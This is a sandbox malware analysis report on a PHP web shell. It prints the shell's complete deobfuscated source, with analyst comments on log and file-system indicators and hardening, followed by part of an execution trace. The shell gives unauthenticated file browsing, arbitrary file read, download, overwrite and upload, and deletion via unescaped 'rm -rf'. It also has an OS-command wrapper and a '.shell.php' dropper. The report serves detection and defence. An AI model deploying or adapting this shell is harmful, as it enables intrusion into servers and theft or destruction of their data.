PHP Malware Analysis

1.php

md5: d8992f44fb3646573cb5b7bc6f960d19

Screenshot


Attributes

Environment

Execution

Files

Input

Title
  • (Original)
  • Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 (HTML)


Deobfuscated PHP code

<!DOCTYPE HTML>
<html>
<head>
<link href="" rel="stylesheet" type="text/css">
<style>
body{
font-family:Times New Roman;
background-color: black;
color:white;
}
#content tr:hover{
background-color: blue;
text-shadow:0px 0px 10px #fff;
}
#content .first{
background-color: blue;
}
table{
border: 1px #000000 dotted;
}
a{
color:white;
text-decoration: none;
}
a:hover{
color:blue;
text-shadow:0px 0px 10px #ffffff;
}
input,select,textarea{
border: 1px #000000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
</style>
</head>
<body>
<?php 
// Analyst note: the three calls below are environment setup that runs on every request.
// error_reporting(0) silences PHP diagnostics, so failures of the file operations
// further down never surface in the response (the sandbox trace shows the previous
// level, 22527, being returned).
error_reporting(0);
// Lifts the script execution time limit; in the recorded trace this call returned FALSE.
set_time_limit(0);
// Asks the browser to switch off its legacy reflected-XSS filter. The HTML head above
// has already been emitted at this point, so whether the header is actually sent
// depends on output buffering -- not determinable from the listing.
header("X-XSS-Protection: 0");
/**
 * Resolve the directory the file manager operates on.
 *
 * Analyst note: the `d` query parameter is returned verbatim -- no normalisation,
 * no allow-list, no confinement to the web root -- and every file operation in this
 * script is built on the result. Requests to an uploads directory that carry an
 * absolute path in `d` are therefore a useful access-log indicator for this sample.
 *
 * @return mixed Caller-supplied `d` value, or getcwd() when `d` is absent
 *               (the trace shows the getcwd() fallback returning '/var/www/html/uploads').
 */
function getpath()
{
    if (isset($_GET['d'])) {
        $d = $_GET['d'];
    } else {
        $d = getcwd();
    }
    return $d;
}
/**
 * Run an OS command and return its output, using whichever PHP execution
 * primitive is available.
 *
 * Analyst note: the probing order is system, exec, passthru, shell_exec; the first
 * one for which function_exists() is true is used. Seeing all four names probed in
 * one function is a common static signature for web shells. In the deobfuscated
 * listing as shown, nothing calls this function (the page renders a "Command" form
 * that posts a=cmd, but the dispatcher has no matching branch).
 * Hardening: restricting these functions via disable_functions and alerting on
 * shells spawned by the web-server user both cover this code path.
 *
 * @param string $cmd Command line, passed to the shell unmodified.
 * @return string|null Captured output; nothing is returned when none of the four
 *                     functions exists.
 */
function cmd($cmd)
{
    if (function_exists('system')) {
        // Output buffering captures what system() would otherwise print directly.
        @ob_start();
        @system($cmd);
        $buff = @ob_get_contents();
        @ob_end_clean();
        return $buff;
    } elseif (function_exists('exec')) {
        @exec($cmd, $results);
        $buff = "";
        // Output lines are concatenated without separators, so line breaks are lost here.
        foreach ($results as $result) {
            $buff .= $result;
        }
        return $buff;
    } elseif (function_exists('passthru')) {
        @ob_start();
        @passthru($cmd);
        $buff = @ob_get_contents();
        @ob_end_clean();
        return $buff;
    } elseif (function_exists('shell_exec')) {
        $buff = @shell_exec($cmd);
        return $buff;
    }
}
/**
 * Delete a file or directory, falling back to a shell `rm -rf`.
 *
 * Analyst note: for a non-empty directory the first rmdir() fails and the loop walks
 * scandir() output, which starts with '.' and '..' (see the scandir result in the
 * trace). Both are directories, so the `rm -rf` shell-out is reached on the first
 * iteration. The path is concatenated into the command line without escaping.
 * A `rm -rf` child process owned by the web-server user is the observable to hunt for.
 *
 * @param string $dir Path to remove; the dispatcher passes $_GET['d'] directly.
 * @return mixed Result of the last removal attempt. $rm is never assigned when the
 *               initial rmdir() succeeds, so the return value is undefined in that case.
 */
function delete($dir)
{
    if (is_dir($dir)) {
        // Only enter the manual cleanup when a plain rmdir() is refused.
        if (!rmdir($dir)) {
            $s = scandir($dir);
            foreach ($s as $ss) {
                if (is_file($dir . "/" . $ss)) {
                    if (unlink($dir . "/" . $ss)) {
                        // Retried after every removed file; succeeds once the directory is empty.
                        $rm = rmdir($dir);
                    }
                }
                if (is_dir($dir . "/" . $ss)) {
                    // Booleans and system() output are string-concatenated; the value
                    // is only ever used as a loose truthiness flag by the caller.
                    $rm = rmdir($dir . "/" . $ss);
                    $rm .= rmdir($dir);
                    $rm .= system('rm -rf ' . $dir);
                }
            }
        }
    } elseif (is_file($dir)) {
        $rm = unlink($dir);
        if (!$rm) {
            // Same unescaped shell fallback for single files.
            system('rm -rf ' . $dir);
        }
    }
    return $rm;
}
/**
 * Return the owner of a path for the listing's "owner:group" column.
 *
 * Analyst note: when the posix extension is present the numeric uid is resolved through
 * posix_getpwuid(), which reads the host's account database -- the trace shows the
 * full passwd entry (name, uid, gid, home, shell) being returned for each row. Only
 * the 'name' field is kept.
 *
 * @param string $path Path to inspect.
 * @return mixed Account name when posix_getpwuid() exists, otherwise the raw
 *               fileowner() result.
 */
function getowner($path)
{
    if (function_exists('posix_getpwuid')) {
        $downer = @posix_getpwuid(fileowner($path));
        $downer = $downer['name'];
    } else {
        $downer = fileowner($path);
    }
    return $downer;
}
/**
 * Return the group of a path for the listing's "owner:group" column.
 *
 * Mirrors getowner(): the gid from filegroup() is resolved through posix_getgrgid()
 * when that function exists, and only the 'name' field of the result is kept.
 *
 * @param string $path Path to inspect.
 * @return mixed Group name when posix_getgrgid() exists, otherwise the raw
 *               filegroup() result.
 */
function getgroup($path)
{
    if (function_exists('posix_getgrgid')) {
        $dgrp = @posix_getgrgid(filegroup($path));
        $dgrp = $dgrp['name'];
    } else {
        $dgrp = filegroup($path);
    }
    return $dgrp;
}
/**
 * Store an uploaded file at its destination.
 *
 * Analyst note: this is the write primitive behind the shell's "Upload file" form.
 * The destination is whatever the caller built from `d` and the client-supplied
 * file name; nothing here restricts extension, content or target directory.
 * Newly created script files under a web-writable directory are the artefact to
 * look for on disk.
 *
 * @param string $a Temporary upload path (tmp_name).
 * @param string $b Destination path.
 * @return mixed Result of move_uploaded_file() or copy(); $upl stays unassigned if
 *               neither function exists.
 */
function upload($a, $b)
{
    if (function_exists('move_uploaded_file')) {
        $upl = move_uploaded_file($a, $b);
    } elseif (function_exists('copy')) {
        $upl = copy($a, $b);
    }
    return $upl;
}
/**
 * Re-shape a multi-file upload entry into one array per file.
 *
 * Takes an array whose keys each hold a list indexed by file number and returns a
 * list of per-file arrays carrying the same keys. The dispatcher feeds it
 * $_FILES['filup'].
 *
 * @param array $file Upload entry; must contain a 'name' list, which sets the count.
 * @return array One associative array per uploaded file.
 */
function array_upload($file)
{
    $file_ary = array();
    // The number of files is taken from the 'name' list.
    $file_count = count($file['name']);
    $file_key = array_keys($file);
    for ($i = 0; $i < $file_count; $i++) {
        foreach ($file_key as $val) {
            $file_ary[$i][$val] = $file[$val][$i];
        }
    }
    return $file_ary;
}
/**
 * List a directory and make it the process working directory.
 *
 * Analyst note: besides returning scandir() output this calls chdir(), so later
 * relative paths resolve against the attacker-chosen directory (the trace shows both
 * calls succeeding on '/var/www/html/uploads').
 * NOTE(analysis): the fallback passes the directory path itself to system(), i.e. it
 * would try to execute the path as a command. That looks like an authoring mistake
 * rather than intended behaviour -- confirm against other variants of the sample.
 *
 * @param string $dir Directory to list; the caller passes getpath().
 * @return mixed scandir() result, or the system() return value in the fallback.
 */
function sedirs($dir)
{
    if (function_exists('scandir')) {
        $s = scandir($dir);
        chdir($dir);
    } else {
        $s = system($dir);
    }
    return $s;
}
/**
 * Render a path's mode bits as an `ls -l` style string such as 'drwxrwxrwx'.
 *
 * The first character is chosen from the file-type bits (socket, link, regular file,
 * block device, directory, character device, pipe; 'u' when none match), followed by
 * nine r/w/x flags for user, group and other. Only the nine permission bits are
 * rendered; no other mode bits are inspected below.
 *
 * Analyst note: this column lets the operator spot world-writable locations at a
 * glance -- the trace shows 'drwxrwxrwx' for the 'data' directory.
 *
 * @param string $files Path to inspect.
 * @return string Mode string, or "???????????" when fileperms() fails or returns 0.
 */
function getperms($files)
{
    if ($s_m = @fileperms($files)) {
        $s_p = 'u';
        // File-type nibble, tested from the widest mask down.
        if (($s_m & 0xc000) == 0xc000) {
            $s_p = 's';
        } elseif (($s_m & 0xa000) == 0xa000) {
            $s_p = 'l';
        } elseif (($s_m & 0x8000) == 0x8000) {
            $s_p = '-';
        } elseif (($s_m & 0x6000) == 0x6000) {
            $s_p = 'b';
        } elseif (($s_m & 0x4000) == 0x4000) {
            $s_p = 'd';
        } elseif (($s_m & 0x2000) == 0x2000) {
            $s_p = 'c';
        } elseif (($s_m & 0x1000) == 0x1000) {
            $s_p = 'p';
        }
        // Owner bits.
        $s_p .= $s_m & 0400 ? 'r' : '-';
        $s_p .= $s_m & 0200 ? 'w' : '-';
        $s_p .= $s_m & 0100 ? 'x' : '-';
        // Group bits.
        $s_p .= $s_m & 040 ? 'r' : '-';
        $s_p .= $s_m & 020 ? 'w' : '-';
        $s_p .= $s_m & 010 ? 'x' : '-';
        // Other bits.
        $s_p .= $s_m & 04 ? 'r' : '-';
        $s_p .= $s_m & 02 ? 'w' : '-';
        $s_p .= $s_m & 01 ? 'x' : '-';
        return $s_p;
    } else {
        return "???????????";
    }
}
/**
 * Stream a file to the client as an attachment and terminate the script.
 *
 * Analyst note: this is the sample's exfiltration primitive. The dispatcher builds
 * $file from the `d` and `f` query parameters with no path restriction, so anything
 * readable by the web-server user can be retrieved. In web logs this shows up as a
 * request with a=download; the response carries Content-Type
 * application/octet-stream and a Content-Disposition naming the file.
 *
 * @param string $file Path of the file to send.
 * @return void Never returns; exits after readfile().
 */
function downloads($file)
{
    // Drops buffered page output so only the file bytes reach the client (error suppressed).
    @ob_clean();
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . basename($file) . '"');
    header('Expires: 0');
    header('Cache-Control: must-revalidate');
    header('Pragma: public');
    header('Content-Length: ' . filesize($file));
    readfile($file);
    exit;
}
/**
 * Display a file's contents in a read-only textarea.
 *
 * Analyst note: arbitrary-file-read in the browser. The file body is passed through
 * htmlspecialchars(); the file name in the heading is echoed without escaping.
 *
 * @param string $file Path to display; built by the dispatcher from `d` and `f`.
 * @return void
 */
function viewfilefunc($file)
{
    echo "<center><h1> View : " . basename($file) . "</h1>";
    echo "<textarea readonly cols='100' rows='40'>";
    echo htmlspecialchars(file_get_contents($file));
    echo "</textarea></center>";
}
/**
 * Format a byte count as a human-readable size with two decimals.
 *
 * The unit is picked as floor(log(size) / log(1024)) and the value is divided by
 * 1024 raised to that power; the trace shows 4096 rendered as '4.00 KB' and 64 as
 * '64.00 B'.
 *
 * @param int|float $s_s Size in bytes.
 * @return string|int Formatted size, or integer 0 for sizes of zero or less.
 */
function ts($s_s)
{
    if ($s_s <= 0) {
        return 0;
    }
    $s_w = array('B', 'KB', 'MB', 'GB', 'TB', 'PB', 'EB', 'ZB', 'YB');
    // Index of the unit in $s_w.
    $s_e = floor(log($s_s) / log(1024));
    return sprintf('%.2f ' . $s_w[$s_e], $s_s / pow(1024, floor($s_e)));
}
/**
 * Return the display size of a path for the listing's "Size" column.
 *
 * @param string $s_f Path to measure.
 * @return string|int ts()-formatted size, integer 0 for empty files, or "???" when
 *                    filesize() fails (errors are suppressed with @).
 */
function getsize($s_f)
{
    $s_s = @filesize($s_f);
    if ($s_s !== false) {
        if ($s_s <= 0) {
            return 0;
        }
        return ts($s_s);
    } else {
        return "???";
    }
}
/**
 * Copy the contents of $a into a new file named "<b>.shell.php".
 *
 * Analyst note: dropper helper. Nothing in the deobfuscated listing calls it, so how
 * it was meant to be invoked is not visible here. file_get_contents() also accepts
 * URLs when allow_url_fopen is enabled, so $a may have been intended as a remote
 * source -- unconfirmed. The fixed ".shell.php" suffix is a cheap file-system
 * indicator: search web roots for files ending in it.
 *
 * @param string $a Source to read.
 * @param string $b Destination path prefix; ".shell.php" is appended.
 * @return void
 */
function kuchiyose($a, $b)
{
    $fgc = file_get_contents($a);
    $fp = fopen($b . ".shell.php", 'w');
    fwrite($fp, $fgc);
    fclose($fp);
}
/**
 * Report whether "<f>.shell.php" exists and print a link to it.
 *
 * Analyst note: companion to kuchiyose() -- it checks for the file that helper
 * writes. Like kuchiyose(), it has no caller in the deobfuscated listing. The
 * "Request done !" string together with the ".shell.php" suffix is usable as
 * static signature material.
 *
 * @param string $f Path prefix to test.
 * @return void
 */
function cekk($f)
{
    if (file_exists($f . ".shell.php")) {
        echo "<b>Request done ! <a href='{$f}.shell.php' target='_blank'>Click here</a>";
    }
}
/**
 * Show a rename form and, when it is submitted, rename the entry.
 *
 * Analyst note: the new name comes straight from $_POST['newname'] and is appended
 * to $dir without checks, so the target can carry path separators. Both $oldname
 * and $dir are echoed into the page unescaped.
 *
 * @param string $dir     Directory containing the entry.
 * @param string $oldname Current entry name.
 * @return void
 */
function renamefunc($dir, $oldname)
{
    echo "<center><h1>Rename : " . $oldname . "</h1><br><form method='POST' class='in'>oldname : <input type='text' value='{$oldname}' class='in' readonly>";
    echo "Newname : <input type='text' name='newname' value='newname' class='in'><input type='submit' value='>>' name='s'></form></center>";
    // The submit button's name ('s') is the trigger for the rename.
    if (isset($_POST['s'])) {
        rename($dir . "/" . $oldname, $dir . "/" . $_POST['newname']);
        echo "<meta http-equiv='refresh' content='0;url=?d=" . dirname($dir) . "'>";
    }
}
/**
 * Show a file in an editable textarea and overwrite it on submit.
 *
 * Analyst note: arbitrary file overwrite as the web-server user. This is the path by
 * which existing application files can be modified in place, so after finding this
 * sample, compare site files against a known-good copy rather than only removing
 * the shell. The confirmation string "Tersimpan @" (Indonesian/Malay for "saved")
 * is usable as signature material.
 *
 * @param string $dir  Directory of the file; the dispatcher passes $_GET['d'].
 * @param string $file File name; the dispatcher passes $_GET['f'].
 * @return void
 */
function editfunc($dir, $file)
{
    echo "<center><h1> Edit : " . $file . "</h1><br><form method='POST'>";
    echo "<textarea name='editfile' cols='100' rows='40'>" . htmlspecialchars(file_get_contents($dir . "/" . $file)) . "</textarea><br>";
    echo "<input type='submit' name='sbmt' value='>>submit<<' style='width:200px;'>";
    echo "</form>";
    if (isset($_POST['sbmt'])) {
        // Mode 'w' truncates the target before the posted content is written.
        $fp = fopen($dir . "/" . $file, 'w');
        fwrite($fp, $_POST['editfile']);
        fclose($fp);
        echo "<br><b>Tersimpan @" . date('D ,d m Y') . "</b><br>";
    }
}
/**
 * Show a "new file" form and create the named file on submit.
 *
 * Analyst note: the form pre-fills 'newfile.php', and after creation the user is
 * sent to the edit action for the same file -- i.e. a create-then-fill workflow for
 * planting additional scripts. The file name is taken from $_POST['filename']
 * unchecked. The literal '#new file 1945' is written only on the fopen() fallback.
 *
 * @param string $dir Directory in which to create the file.
 * @return void
 */
function berinamafunc($dir)
{
    echo "<center><h1>New file </h1><br><form method='POST' class='in'>";
    echo "Filename : <input type='text' name='filename' value='newfile.php'>";
    echo "<input type='submit' name='svi' value='>>'>";
    echo "</form>";
    if (isset($_POST['svi'])) {
        if (function_exists('touch')) {
            touch($dir . "/" . $_POST['filename']);
        } else {
            $fp = fopen($dir . "/" . $_POST['filename'], 'w');
            fwrite($fp, '#new file 1945');
            fclose($fp);
        }
        // Page output has already started by the time this runs, so the redirect
        // presumably only takes effect when output buffering is on -- unconfirmed.
        header('location:?d=' . $dir . '&a=edit&f=' . $_POST['filename']);
    }
}
/**
 * Show a "new directory" form and create the directory on submit.
 *
 * Analyst note: the directory name comes from $_POST['mkdir'] and is appended to
 * $dir unchecked; mkdir() is called without an explicit mode argument.
 *
 * @param string $dir Parent directory.
 * @return void
 */
function mkdirfunc($dir)
{
    echo "<center><h1>New directory</h1>";
    echo "<form method='POST' class='in'>New dir:<input type='text' name='mkdir'>";
    echo "<input type='submit' name='sbmt' value='>>'></form></center>";
    if (isset($_POST['sbmt'])) {
        mkdir($dir . "/" . $_POST['mkdir']);
        echo "<meta http-equiv='refresh' content='0;url=?d=" . $dir . "'>";
    }
}
// Working directory for this request: the raw `d` parameter, or getcwd().
$gp = getpath();
// Host fingerprint (OS, hostname, kernel build). It is printed as the page title,
// which is why the sandbox report's "Title" attribute shows the uname string.
$y = php_uname();
?>
	<title><?php 
echo $y;
?></title>
</head>
<body>
</form>
<form method="post" class="in" enctype="multipart/form-data" action="?d=<?php 
// $gp is echoed into the attribute without escaping, here and in the links below.
echo $gp;
?>&a=upload"> Upload file :<input type="file" name="filup[]" multiple="" style="border: 0"><input type="submit" name="upload" value=">>"></form><form method="post" action="?d=<?php 
// Analyst note: this form posts a `cmd` field to a=cmd. Requests with a=cmd in the
// query string are worth searching for in access logs even though the dispatcher
// in this listing has no branch that handles them.
echo $gp;
?>&a=cmd" class="in"> Command : <input type="text" name="cmd"></form>
<form method="post" action="?d=<?php 
echo $gp;
?>&a=up">
</form>
<a href="?d=<?php 
echo $gp;
?>&a=up">Upload</a>
</div>
<hr>
<?php 
// Breadcrumb navigation. Note that it reads the `path` parameter, while every link
// the script generates uses `d`; when `path` is absent the breadcrumb is built from
// getcwd() (the trace shows '/var/www/html/uploads' being split here).
echo "Current Dir=|> ";
if (isset($_GET['path'])) {
    $path = $_GET['path'];
} else {
    $path = getcwd();
}
// Normalise Windows separators so the same split works on both platforms.
$path = str_replace('\\', '/', $path);
$paths = explode('/', $path);
foreach ($paths as $id => $pat) {
    // A leading empty component means an absolute path: emit the root link.
    if ($pat == '' && $id == 0) {
        $a = true;
        echo "<a href=\"?d=/\">/</a>";
        continue;
    }
    if ($pat == '') {
        continue;
    }
    // Each component links to the path made of all components up to and including it.
    // Components are echoed into the markup unescaped.
    echo "<a href=\"?d=";
    for ($i = 0; $i <= $id; $i++) {
        echo "{$paths[$i]}";
        if ($i != $id) {
            echo "/";
        }
    }
    echo '">' . $pat . '</a>/';
}
// Analyst note: request router. With no `a` parameter the script renders the
// directory listing; otherwise the else-branch below dispatches on `a`. Nothing in
// this listing checks a password, cookie or session before either path runs, so the
// file is usable by anyone who can reach its URL.
if (empty($_GET['a'])) {
    ?>
<table align="center" class="table">
	<th>Files</th><th>Size</th><th>owner:group</th><th>Permission</th><th>Action</th>
<?php 
    // sedirs() also chdir()s into the requested directory as a side effect.
    $dir = sedirs(getpath());
    echo "<tr><td><a href=\"?d=" . dirname($gp) . "\">Current dir</a></td><td>--</td><td>--</td><td>--</td><td align=right><a href='?d={$gp}&a=touch'>Newfile</a> | <a href='?d={$gp}&a=mkdir'>newdir</a></td></tr>";
    // First pass: sub-directories only.
    foreach ($dir as $d1) {
        if (!is_dir("{$gp}/{$d1}") || $d1 == "." || $d1 == "..") {
            continue;
        }
        ?>
	<tr><td>[<a href="?d=<?php 
        echo "{$gp}/{$d1}";
        ?>"><?php 
        echo $d1;
        ?></a>]</td>
	<td><?php 
        echo getsize("{$gp}/{$d1}");
        ?></td>
	<td><?php 
        // NOTE(analysis): $f1 is not assigned until the file loop further down, so this
        // evaluates to "{$gp}/" -- the trace shows getowner() and getgroup() being called
        // with '/var/www/html/uploads/' for the 'data' row. The owner and group shown
        // for sub-directories are therefore those of the parent directory.
        echo getowner("{$gp}/{$f1}");
        ?>:<?php 
        echo getgroup("{$gp}/{$f1}");
        ?></td>
	<td><?php 
        echo getperms("{$gp}/{$d1}");
        ?></td>
	<td align="right"><a href="?d=<?php 
        echo "{$gp}/{$d1}";
        ?>&a=rename">Rename</a> | <a href="?d=<?php 
        echo "{$gp}/{$d1}";
        ?>&a=delete">Delete</a></td>
	</tr>
	<?php 
    }
    // Second pass: regular files, each with rename / delete / edit / download links.
    foreach ($dir as $f1) {
        if (!is_file("{$gp}/{$f1}") || $f1 == "." || $f1 == "..") {
            continue;
        }
        ?>
	<tr><td><a href="?d=<?php 
        echo $gp;
        ?>&a=view&f=<?php 
        echo $f1;
        ?>"><?php 
        echo $f1;
        ?></a></td>
	<td><?php 
        echo getsize("{$gp}/{$f1}");
        ?></td>
	<td><?php 
        echo getowner("{$gp}/{$f1}");
        ?>:<?php 
        echo getgroup("{$gp}/{$f1}");
        ?></td>
	<td><?php 
        echo getperms("{$gp}/{$f1}");
        ?></td>
	<td align="right">
	<a href="?d=<?php 
        echo $gp;
        ?>&a=rename&f=<?php 
        echo $f1;
        ?>">Rename</a> |
	<a href="?d=<?php 
        echo "{$gp}/{$f1}";
        ?>&a=delete">delete</a> |
	<a href="?d=<?php 
        echo $gp;
        ?>&a=edit&f=<?php 
        echo $f1;
        ?>">edit</a> |
	<a href="?d=<?php 
        echo $gp;
        ?>&a=download&f=<?php 
        echo $f1;
        ?>">download</a></td>
	</tr>
	<?php 
    }
    ?>
</table>
<?php 
} else {
    // Handled actions: view, download, logout, rename, delete, upload, mkdir, touch, edit.
    // The page header also submits a=cmd and a=up, but no branch here handles them, so
    // in this listing cmd() is never reached (delete() still shells out via system()).
    // Treat that as a property of this deobfuscated copy; other variants may differ.
    // Log-hunting aid: the query-string triple d= / a= / f= with these action names.
    @($a = $_GET['a']);
    @($f = $_GET['f']);
    @($d = $_GET['d']);
    if ($a == "view") {
        viewfilefunc($d . "/" . $f);
    } elseif ($a == "download") {
        downloads($d . "/" . $f);
    } elseif ($a == "logout") {
        // Clears a cookie named md5(HTTP_HOST). Nothing in this listing sets or checks
        // that cookie -- presumably a leftover from a password-protected variant.
        if (setcookie(md5($_SERVER['HTTP_HOST']), "")) {
            echo "<script>alert('See You Next time !');window.location.href='????'</script>";
        }
    } elseif ($a == "rename") {
        // Files are addressed as d=<dir>&f=<name>; directories as d=<full path> only.
        $ff = isset($_GET['f']) ? $_GET['f'] : basename($_GET['d']);
        $gdd = isset($_GET['f']) ? $_GET['d'] : dirname($_GET['d']);
        renamefunc($gdd, $ff);
    } elseif ($a == "delete") {
        // Triggered by a plain GET request; the path is taken from `d` unchecked.
        delete($_GET['d']);
        echo "<meta http-equiv='refresh' content='0;url=?d=" . dirname($_GET['d']) . "'>";
    } elseif ($a == "upload") {
        $fil = array_upload($_FILES['filup']);
        foreach ($fil as $filup) {
            // Destination is "<d>/<client-supplied file name>" with no extension or
            // content check; several files can be written per request.
            $filoc = $d . "/" . $filup['name'];
            if (upload($filup['tmp_name'], $filoc)) {
                echo "<font color=lime>Successfully upload -> <a href='?d=" . $d . "&a=view&f=" . $filup['name'] . "'>" . $filoc . "</a></font><br>";
            } else {
                echo "<font color=red>Failed upload -> " . $filoc . "</font><br>";
            }
        }
    } elseif ($a == "mkdir") {
        mkdirfunc($d);
    } elseif ($a == "touch") {
        berinamafunc($d);
    } elseif ($a == "edit") {
        editfunc($_GET['d'], $_GET['f']);
    }
}

Execution traces

data/traces/d8992f44fb3646573cb5b7bc6f960d19_trace-1676248852.0826.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:41:17.980478]
1	0	1	0.000164	393464
1	3	0	0.000643	478472	{main}	1		/var/www/html/uploads/1.php	0	0
2	4	0	0.000661	478472	error_reporting	0		/var/www/html/uploads/1.php	39	1	0
2	4	1	0.000677	478512
2	4	R			22527
2	5	0	0.000690	478472	set_time_limit	0		/var/www/html/uploads/1.php	40	1	0
2	5	1	0.000706	478536
2	5	R			FALSE
2	6	0	0.000719	478504	header	0		/var/www/html/uploads/1.php	41	1	'X-XSS-Protection: 0'
2	6	1	0.000735	478600
2	6	R			NULL
2	7	0	0.000750	478568	getpath	1		/var/www/html/uploads/1.php	186	0
3	8	0	0.000762	478568	getcwd	0		/var/www/html/uploads/1.php	48	0
3	8	1	0.000775	478616
3	8	R			'/var/www/html/uploads'
2		A						/var/www/html/uploads/1.php	48	$d = '/var/www/html/uploads'
2	7	1	0.000802	478616
2	7	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/1.php	186	$gp = '/var/www/html/uploads'
2	9	0	0.000827	478616	php_uname	0		/var/www/html/uploads/1.php	187	0
2	9	1	0.000840	478728
2	9	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1		A						/var/www/html/uploads/1.php	187	$y = 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2	10	0	0.000876	478728	getcwd	0		/var/www/html/uploads/1.php	204	0
2	10	1	0.000888	478776
2	10	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/1.php	204	$path = '/var/www/html/uploads'
2	11	0	0.000912	478776	str_replace	0		/var/www/html/uploads/1.php	206	3	'\\'	'/'	'/var/www/html/uploads'
2	11	1	0.000927	478872
2	11	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/1.php	206	$path = '/var/www/html/uploads'
2	12	0	0.000951	478776	explode	0		/var/www/html/uploads/1.php	207	2	'/'	'/var/www/html/uploads'
2	12	1	0.000964	479352
2	12	R			[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1		A						/var/www/html/uploads/1.php	207	$paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1		A						/var/www/html/uploads/1.php	209	$id = 0
1		A						/var/www/html/uploads/1.php	211	$a = TRUE
1		A						/var/www/html/uploads/1.php	209	$id = 1
1		A						/var/www/html/uploads/1.php	217	$i = 0
1		A						/var/www/html/uploads/1.php	217	$i++
1		A						/var/www/html/uploads/1.php	217	$i++
1		A						/var/www/html/uploads/1.php	209	$id = 2
1		A						/var/www/html/uploads/1.php	217	$i = 0
1		A						/var/www/html/uploads/1.php	217	$i++
1		A						/var/www/html/uploads/1.php	217	$i++
1		A						/var/www/html/uploads/1.php	217	$i++
1		A						/var/www/html/uploads/1.php	209	$id = 3
1		A						/var/www/html/uploads/1.php	217	$i = 0
1		A						/var/www/html/uploads/1.php	217	$i++
1		A						/var/www/html/uploads/1.php	217	$i++
1		A						/var/www/html/uploads/1.php	217	$i++
1		A						/var/www/html/uploads/1.php	217	$i++
1		A						/var/www/html/uploads/1.php	209	$id = 4
1		A						/var/www/html/uploads/1.php	217	$i = 0
1		A						/var/www/html/uploads/1.php	217	$i++
1		A						/var/www/html/uploads/1.php	217	$i++
1		A						/var/www/html/uploads/1.php	217	$i++
1		A						/var/www/html/uploads/1.php	217	$i++
1		A						/var/www/html/uploads/1.php	217	$i++
2	13	0	0.001194	479280	getpath	1		/var/www/html/uploads/1.php	230	0
3	14	0	0.001205	479280	getcwd	0		/var/www/html/uploads/1.php	48	0
3	14	1	0.001217	479328
3	14	R			'/var/www/html/uploads'
2		A						/var/www/html/uploads/1.php	48	$d = '/var/www/html/uploads'
2	13	1	0.001241	479328
2	13	R			'/var/www/html/uploads'
2	15	0	0.001255	479328	sedirs	1		/var/www/html/uploads/1.php	230	1	'/var/www/html/uploads'
3	16	0	0.001268	479328	function_exists	0		/var/www/html/uploads/1.php	59	1	'scandir'
3	16	1	0.001281	479368
3	16	R			TRUE
3	17	0	0.001294	479328	scandir	0		/var/www/html/uploads/1.php	61	1	'/var/www/html/uploads'
3	17	1	0.001323	479944
3	17	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => '1.php', 4 => 'data', 5 => 'prepend.php']
2		A						/var/www/html/uploads/1.php	61	$s = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => '1.php', 4 => 'data', 5 => 'prepend.php']
3	18	0	0.001360	479912	chdir	0		/var/www/html/uploads/1.php	62	1	'/var/www/html/uploads'
3	18	1	0.001374	480000
3	18	R			TRUE
2	15	1	0.001393	479960
2	15	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => '1.php', 4 => 'data', 5 => 'prepend.php']
1		A						/var/www/html/uploads/1.php	230	$dir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => '1.php', 4 => 'data', 5 => 'prepend.php']
2	19	0	0.001427	479912	dirname	0		/var/www/html/uploads/1.php	231	1	'/var/www/html/uploads'
2	19	1	0.001440	479992
2	19	R			'/var/www/html'
2	20	0	0.001456	479960	is_dir	0		/var/www/html/uploads/1.php	233	1	'/var/www/html/uploads/.'
2	20	1	0.001470	480024
2	20	R			TRUE
2	21	0	0.001484	479992	is_dir	0		/var/www/html/uploads/1.php	233	1	'/var/www/html/uploads/..'
2	21	1	0.001498	480040
2	21	R			TRUE
2	22	0	0.001511	480000	is_dir	0		/var/www/html/uploads/1.php	233	1	'/var/www/html/uploads/.htaccess'
2	22	1	0.001526	480040
2	22	R			FALSE
2	23	0	0.001538	480000	is_dir	0		/var/www/html/uploads/1.php	233	1	'/var/www/html/uploads/1.php'
2	23	1	0.001552	480040
2	23	R			FALSE
2	24	0	0.001564	480000	is_dir	0		/var/www/html/uploads/1.php	233	1	'/var/www/html/uploads/data'
2	24	1	0.001577	480040
2	24	R			TRUE
2	25	0	0.001591	480000	getsize	1		/var/www/html/uploads/1.php	236	1	'/var/www/html/uploads/data'
3	26	0	0.001603	480000	filesize	0		/var/www/html/uploads/1.php	118	1	'/var/www/html/uploads/data'
3	26	1	0.001615	480040
3	26	R			4096
2		A						/var/www/html/uploads/1.php	118	$s_s = 4096
3	27	0	0.001638	480000	ts	1		/var/www/html/uploads/1.php	121	1	4096
3		A						/var/www/html/uploads/1.php	113	$s_w = [0 => 'B', 1 => 'KB', 2 => 'MB', 3 => 'GB', 4 => 'TB', 5 => 'PB', 6 => 'EB', 7 => 'ZB', 8 => 'YB']
4	28	0	0.001666	480000	log	0		/var/www/html/uploads/1.php	114	1	4096
4	28	1	0.001695	480032
4	28	R			8.3177661667193
4	29	0	0.001709	480000	log	0		/var/www/html/uploads/1.php	114	1	1024
4	29	1	0.001720	480032
4	29	R			6.9314718055995
4	30	0	0.001735	480000	floor	0		/var/www/html/uploads/1.php	114	1	1.2
4	30	1	0.001747	480032
4	30	R			1
3		A						/var/www/html/uploads/1.php	114	$s_e = 1
4	31	0	0.001769	480032	floor	0		/var/www/html/uploads/1.php	115	1	1
4	31	1	0.001781	480064
4	31	R			1
4	32	0	0.001793	480032	pow	0		/var/www/html/uploads/1.php	115	2	1024	1
4	32	1	0.001811	480104
4	32	R			1024
